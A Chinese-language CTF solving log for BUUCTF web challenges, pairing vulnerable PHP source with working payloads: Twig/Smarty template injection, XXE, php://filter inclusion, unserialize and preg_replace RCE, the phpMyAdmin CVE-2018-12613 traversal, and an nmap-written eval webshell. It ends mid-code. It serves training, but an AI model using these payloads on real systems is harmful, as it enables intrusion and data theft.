BUU解题记录,乱七八糟的但大部分是Web题
[BJDCTF2020]Cookie is so stable /flag.php
存在模板注入
{{3*3}} => %20%7b%7b%33%2a%33%7d%7d
{{3*'3'}} => %7b%7b%33%2a%27%33%27%7d%7d
Twig 模板注入
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls")} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%22%29%7d%7d
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls /")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%20%2f%22%29%7d%7d
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /flag")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%63%61%74%20%2f%66%6c%61%67%22%29%7d%7d
[WUSTCTF2020]朴实无华 扫目录
py -3 dirsearch.py -u http://a14b2b12-84cc-4091-ad39-ccb3ef43d269.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429
/robots.txt
User-agent: * Disallow: /fAke_f1agggg.php
hint: Look_at_me: /fl4g.php
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>"; }else{ die("金钱解决不了穷人的本质问题"); } }else{ die("去非洲吧"); } //level 2 if (isset($_GET['md5'])){ $md5=$_GET['md5']; if ($md5==md5($md5)) echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>"; else die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); }else{ die("去非洲吧"); } //get flag if (isset($_GET['get_flag'])){ $get_flag = $_GET['get_flag']; if(!strstr($get_flag," ")){ $get_flag = str_ireplace("cat", "wctf2020", $get_flag); echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>"; system($get_flag); }else{ die("快到非洲了"); } }else{ die("去非洲吧"); } ?>
PHP/5.5.38 科学记数法绕过 intval 2e9
md5弱类型比较
0e215962017 => 0e291242476940776845150308577824
黑名单绕过 ${IFS} 绕过空格
?num=2e9&md5=0e215962017&get_flag=ls
?num=2e9&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
[安洵杯 2019]easy_web data 协议传输图片
<img src="data:image/gif;base64,PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4=">
尝试解码 img 参数
两次 base64 解码,一次 hex 解码
TXpVek5UTTFNbVUzTURabE5qYz0 => MzUzNTM1MmU3MDZlNjc= => 3535352e706e67 => 555.webp
读取源码
index.php => 696e6465782e706870 => Njk2ZTY0NjU3ODJlNzA2ODcw => TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4=
base64 解码
<?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='); $file = hex2bin(base64_decode(base64_decode($_GET['img']))); $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file); if (preg_match("/flag/i", $file)) { echo '<img src ="./ctf3.jpeg">'; die("xixi~ no flag"); } else { $txt = base64_encode(file_get_contents($file)); echo "<img src='data:image/gif;base64," . $txt . "'></img>"; echo "<br>"; } echo $cmd; echo "<br>"; if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~"); echo "<br>"; } else { if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } } ?>
md5 强类型比较
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
cmd 传参处 dir 没有过滤
\
绕过正则匹配
[NCTF2019]Fake XML cookbook XXE使用file协议读取flag
XXE <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE username [ <!ENTITY file SYSTEM "file:///flag"> ]> <user><username>&file;</username><password>0</password></user>
[强网杯 2019]高明的黑客 /www.tar.gz
下载源码
需要找到可以利用的有效代码段
有许多可用的脚本,如下
$XnEGfa = $_GET['Efa5BVG'] ?? ' ';
[BJDCTF2020]Mark loves cat 在 CONTACT 处尝试后无果
扫目录
GitHack 下载源码
index.php
<?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } } if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); } echo "the flag is: ".$flag; ?>
flag.php
<?php $flag = file_get_contents('/flag'); ?>
exit 输出一个消息并且退出当前脚本,当参数是字符串时输出字符串,当参数为 int 型时作为退出状态码不会输出,退出状态码为0时成功中止
foreach 函数存在变量覆盖
get 传参时变量名不能为 flag 且 变量值为 flag 时输出当前 $handsome 的值
当 get post 的参数不含 flag 时输出当前 $yds 的值
当 get post 的参数同为 flag 时输出当前 $is 的值
yds=flag is=flag&flag=flag handsome=flag&flag=x&x=flag
[BSidesCF 2020]Had a bad day category=php://filter/read=convert.base64-encode/resource=index.php
include(php://filter/read=convert.base64-encode/resource=index.php.php)
报错提示多了个 .php
category=php://filter/read=convert.base64-encode/resource=index
PGh0bWw+CiAgPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UiPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkltYWdlcyB0aGF0IHNwYXJrIGpveSI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCwgbWluaW11bS1zY2FsZT0xLjAiPgogICAgPHRpdGxlPkhhZCBhIGJhZCBkYXk/PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL21hdGVyaWFsLm1pbi5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3Mvc3R5bGUuY3NzIj4KICA8L2hlYWQ+CiAgPGJvZHk+CiAgICA8ZGl2IGNsYXNzPSJwYWdlLWxheW91dCBtZGwtbGF5b3V0IG1kbC1sYXlvdXQtLWZpeGVkLWhlYWRlciBtZGwtanMtbGF5b3V0IG1kbC1jb2xvci0tZ3JleS0xMDAiPgogICAgICA8aGVhZGVyIGNsYXNzPSJwYWdlLWhlYWRlciBtZGwtbGF5b3V0X19oZWFkZXIgbWRsLWxheW91dF9faGVhZGVyLS1zY3JvbGwgbWRsLWNvbG9yLS1ncmV5LTEwMCBtZGwtY29sb3ItdGV4dC0tZ3JleS04MDAiPgogICAgICAgIDxkaXYgY2xhc3M9Im1kbC1sYXlvdXRfX2hlYWRlci1yb3ciPgogICAgICAgICAgPHNwYW4gY2xhc3M9Im1kbC1sYXlvdXQtdGl0bGUiPkhhZCBhIGJhZCBkYXk/PC9zcGFuPgogICAgICAgICAgPGRpdiBjbGFzcz0ibWRsLWxheW91dC1zcGFjZXIiPjwvZGl2PgogICAgICAgIDxkaXY+CiAgICAgIDwvaGVhZGVyPgogICAgICA8ZGl2IGNsYXNzPSJwYWdlLXJpYmJvbiI+PC9kaXY+CiAgICAgIDxtYWluIGNsYXNzPSJwYWdlLW1haW4gbWRsLWxheW91dF9fY29udGVudCI+CiAgICAgICAgPGRpdiBjbGFzcz0icGFnZS1jb250YWluZXIgbWRsLWdyaWQiPgogICAgICAgICAgPGRpdiBjbGFzcz0ibWRsLWNlbGwgbWRsLWNlbGwtLTItY29sIG1kbC1jZWxsLS1oaWRlLXRhYmxldCBtZGwtY2VsbC0taGlkZS1waG9uZSI+PC9kaXY+CiAgICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWNvbnRlbnQgbWRsLWNvbG9yLS13aGl0ZSBtZGwtc2hhZG93LS00ZHAgY29udGVudCBtZGwtY29sb3ItdGV4dC0tZ3JleS04MDAgbWRsLWNlbGwgbWRsLWNlbGwtLTgtY29sIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icGFnZS1jcnVtYnMgbWRsLWNvbG9yLXRleHQtLWdyZXktNTAwIj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDxoMz5DaGVlciB1cCE8L2gzPgogICAgICAgICAgICAgIDxwPgogICAgICAgICAgICAgICAgRGlkIHlvdSBoYXZlIGEgYmFkIGRheT8gRGlkIHRoaW5ncyBub3QgZ28geW91ciB3YXkgdG9kYXk/IEFyZSB5b3UgZmVlbGluZyBkb3duPyBQaWNrIGFuIG9wdGlvbiBhbmQgbGV0IHRoZSBhZG9yYWJsZSBpbWFnZXMgY2hlZXIgeW91IHVwIQogICAgICAgICAgICAgIDwvcD4KICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWluY2x1ZGUiPgogICAgICAgICAgICAgIDw/cGhwCgkJCQkkZmlsZSA9ICRfR0VUWydjYXRlZ29yeSddOwoKCQkJCWlmKGlzc2V0KCRmaWxlKSkKCQkJCXsKCQkJCQlpZiggc3RycG9zKCAkZmlsZSwgIndvb2ZlcnMiICkgIT09ICBmYWxzZSB8fCBzdHJwb3MoICRmaWxlLCAibWVvd2VycyIgKSAhPT0gIGZhbHNlIHx8IHN0cnBvcyggJGZpbGUsICJpbmRleCIpKXsKCQkJCQkJaW5jbHVkZSAoJGZpbGUgLiAnLnBocCcpOwoJCQkJCX0KCQkJCQllbHNlewoJCQkJCQllY2hvICJTb3JyeSwgd2UgY3VycmVudGx5IG9ubHkgc3VwcG9ydCB3b29mZXJzIGFuZCBtZW93ZXJzLiI7CgkJCQkJfQoJCQkJfQoJCQkJPz4KCQkJPC9kaXY+CiAgICAgICAgICA8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJnZXQiIGlkPSJjaG9pY2UiPgogICAgICAgICAgICAgIDxjZW50ZXI+PGJ1dHRvbiBvbmNsaWNrPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2hvaWNlJykuc3VibWl0KCk7IiBuYW1lPSJjYXRlZ29yeSIgdmFsdWU9Indvb2ZlcnMiIGNsYXNzPSJtZGwtYnV0dG9uIG1kbC1idXR0b24tLWNvbG9yZWQgbWRsLWJ1dHRvbi0tcmFpc2VkIG1kbC1qcy1idXR0b24gbWRsLWpzLXJpcHBsZS1lZmZlY3QiIGRhdGEtdXBncmFkZWQ9IixNYXRlcmlhbEJ1dHRvbixNYXRlcmlhbFJpcHBsZSI+V29vZmVyczxzcGFuIGNsYXNzPSJtZGwtYnV0dG9uX19yaXBwbGUtY29udGFpbmVyIj48c3BhbiBjbGFzcz0ibWRsLXJpcHBsZSBpcy1hbmltYXRpbmciIHN0eWxlPSJ3aWR0aDogMTg5LjM1NnB4OyBoZWlnaHQ6IDE4OS4zNTZweDsgdHJhbnNmb3JtOiB0cmFuc2xhdGUoLTUwJSwgLTUwJSkgdHJhbnNsYXRlKDMxcHgsIDI1cHgpOyI+PC9zcGFuPjwvc3Bhbj48L2J1dHRvbj4KICAgICAgICAgICAgICA8YnV0dG9uIG9uY2xpY2s9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaG9pY2UnKS5zdWJtaXQoKTsiIG5hbWU9ImNhdGVnb3J5IiB2YWx1ZT0ibWVvd2VycyIgY2xhc3M9Im1kbC1idXR0b24gbWRsLWJ1dHRvbi0tY29sb3JlZCBtZGwtYnV0dG9uLS1yYWlzZWQgbWRsLWpzLWJ1dHRvbiBtZGwtanMtcmlwcGxlLWVmZmVjdCIgZGF0YS11cGdyYWRlZD0iLE1hdGVyaWFsQnV0dG9uLE1hdGVyaWFsUmlwcGxlIj5NZW93ZXJzPHNwYW4gY2xhc3M9Im1kbC1idXR0b25fX3JpcHBsZS1jb250YWluZXIiPjxzcGFuIGNsYXNzPSJtZGwtcmlwcGxlIGlzLWFuaW1hdGluZyIgc3R5bGU9IndpZHRoOiAxODkuMzU2cHg7IGhlaWdodDogMTg5LjM1NnB4OyB0cmFuc2Zvcm06IHRyYW5zbGF0ZSgtNTAlLCAtNTAlKSB0cmFuc2xhdGUoMzFweCwgMjVweCk7Ij48L3NwYW4+PC9zcGFuPjwvYnV0dG9uPjwvY2VudGVyPgogICAgICAgICAgPC9mb3JtPgoKICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICA8L21haW4+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQgc3JjPSJqcy9tYXRlcmlhbC5taW4uanMiPjwvc2NyaXB0PgogIDwvYm9keT4KPC9odG1sPg==
<?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?>
参数被限制为 woofers
meowers
index
伪协议嵌套其中一个达到可以匹配 flag 的目的
php://filter/read=convert.base64-encode/woofers/resource=flag
也可以这样构造
category=php://filter/read=convert.base64-encode/resource=woofers/../flag
PCEtLSBDYW4geW91IHJlYWQgdGhpcyBmbGFnPyAtLT4KPD9waHAKIC8vIGZsYWd7MWUwNzY5N2ItYjc1OC00ZDNhLWFhOTEtYmEwNWM0ZDg4MDQ3fQo/Pgo=
<!-- Can you read this flag? --> <?php // flag{1e07697b-b758-4d3a-aa91-ba05c4d88047} ?>
[网鼎杯 2020 朱雀组]phpweb
func=date&p=Y-m-d+h%3Ai%3As+a
调用 date 函数并传入 “Y-m-d h:i:s a”
尝试获取源码
尝试调用 readfile
file_get_contents
highlight_file
函数
func=readfile&p=index.php
<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return $result; } else {return "";} } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } } ?>
__destruct
<?php class Test { var $func="system"; var $p = "cat $(find / -name flag*"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $a=new Test(); echo serialize($a); ?>
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:25:"cat $(find / -name flag*)";}
反斜杠绕过黑名单
[GWCTF 2019]我有一个数据库
编码有问题
扫目录
phpMyAdmin 版本号是 4.8.1
查到 CVE-2018-12613
phpmyadmin4.8.1后台getshell
?target=db_sql.php%253f/../../../../../../../../etc/passwd
?target=db_sql.php%253f/../../../../../../../../flag
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
SELECT '<?php phpinfo()?>';
查看 SESSION ID
?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_5nl1lmmrps8lfjr2l8upr9h9g3
SHOW variables LIKE '%datadir%';
?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/test/test.frm
[BJDCTF2020]ZJCTF,不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ die("Not now!"); } include($file); //next.php } else{ highlight_file(__FILE__); } ?>
php伪协议,文件包含,preg_replace函数e模式
php://input post 传输 I have a dream
data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
file=php://filter/read=convert.base64-encode/resource=next.php
PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
<?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")', $str ); } foreach($_GET as $re => $str) { echo complex($re, $str). "\n"; } function getFlag(){ @eval($_GET['cmd']); }
CVE-2016-5734 由 preg_replace 引发的 RCE
深入研究preg_replace与代码执行
?\S*=${getFlag()}&cmd=system('cat /flag');
L1ch师傅的另一种思路
?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
[GXYCTF2019]禁止套娃 扫目录发现 .git
GitHack 获取源码
<?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(__FILE__); ?>
过滤了 php 伪协议
(?R)?
递归调用当前整个匹配模式,即匹配可以无限嵌套的无参数函数
无参数RCE
print_r(scandir(‘.’)); 查看当前目录及文件
限制不含参数,即用 current(localeconv()) 代替
flag.php 为倒数第二个值,反转顺序后向前一位将指向 flag.php
print_r(next(array_reverse(scandir(current(localeconv())))));
返回随机键名后反转键名与键值,多次随机后得到想要的键值
print_r(array_rand(array_flip(scandir(current(localeconv())))));
readfile(next(array_reverse(scandir(current(localeconv())))));
[BJDCTF2020]The mystery of ip
通过 X-Forwarded-For 或 Client-IP 伪造 ip 参数
Smarty SSTI PHP
{$smarty.version}
3.1.34-dev-7
{if phpinfo()}{/if}
{php}phpinfo();{/php} (仅在Smarty3.1的SmartyBC中有效)
X-Forwarded-For: {system(‘cat /flag’)}
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); } ?>
host 随便传个 ip 后执行 nmap 命令
escapeshellarg 给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号
escapeshellcmd 反斜线(\)会在以下字符之前插入: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A 和 \xFF, ‘ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替
' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php ' ' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php ' ' \<\?php @eval\(\$_POST\[\"ba2in9a\"\]\)\;\?\> -oG ba2in9a.php '
[RoarCTF 2019]Easy Java 账号密码分别是 admin
admin888
登陆后没有任何可用信息
查看 help 页面
抛出异常 java.io.FileNotFoundException:{help.docx}
请求方式改为 post
没有可用信息
查看别人的WP得知可以查看 WEB-INF
/web.xml
servlet-class 存放在 /WEB-INF/classes 目录下
base64 解码即可得到 flag
[GXYCTF2019]BabyUpload <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"uploaded\" /> <input type=\"submit\" name=\"submit\" value=\"上传\" /> </form>"; error_reporting(0); if(!isset($_SESSION['user'])){ $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000)); } if(isset($_FILES['uploaded'])) { $target_path = getcwd() . "/upload/" . md5($_SESSION['user']); $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']); $uploaded_name = $_FILES['uploaded']['name']; $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name,'.') + 1); $uploaded_size = 